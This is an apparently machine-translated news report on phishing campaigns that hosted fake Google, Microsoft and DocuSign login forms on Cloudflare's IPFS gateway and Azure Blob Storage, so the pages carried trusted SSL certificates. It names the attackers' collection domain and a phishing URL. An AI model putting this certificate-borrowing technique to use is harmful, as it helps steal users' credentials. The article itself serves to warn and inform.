Found Phishing Forms Signed with Certificates Cloudflare and Microsoft – Founder of the publication beepingcomputer.com Lawrence Abrams discovered phishing forms for hunting for accounts Microsoft and Google, signed by certificates of safety Cloudflare. The attackers created them using the service, which provides itself Cloudflare.
Cloudflare recently introduced an IPFS gateway designed to access IPFS distributed storage through a browser. All connections to this gateway are SSL-signed by Cloudflare. The attackers used this gateway to show their victims the HTML document stored there. Seeing the form, signed by the security certificate of a well-known company, users can decide that the form is real and get caught.
When a user submits the form data, his phone number and email address are sent to the attackers page on searchurl.bid, after which a random PDF is displayed with text about business strategies.
The same attackers participated in many other phishing schemes. Using VirusTotal, the authors beepingcomputer.com searched for URLs associated with the searchurl.bid domain and found many pages with phishing forms Some of them are still active and display login forms in Google, Windows, DocuSign and others accounts. Although the addresses of these pages look extremely suspicious, many people in a hurry can enter and send their data.
A phishing attack was previously described using a form located in the Azure Blob Storage datastore. The attackers sent spam with attached PDF files, which allegedly contained scanned documents from a law firm.
Clicking on the link to download PDF, the user gets to the login page to access the services of Microsof 365. This page is hosted at the address https://onedriveunbound80343.blob.core.windows.net- in the Azure Blob Storage. You can connect to this repository both via HTTP and HTTPS, and in the second case the SSL certificate signed by Microsoft will be displayed.
Since this attack is aimed just at phishing logins Office 365, Azure AD and other Microsoft services, such a certificate comes in handy. Even a cautious user, having come to check who issued the SSL certificate, can be deceived when he sees Microsoft there. The main thing that should stop a person is the unusual URL of a fake login page.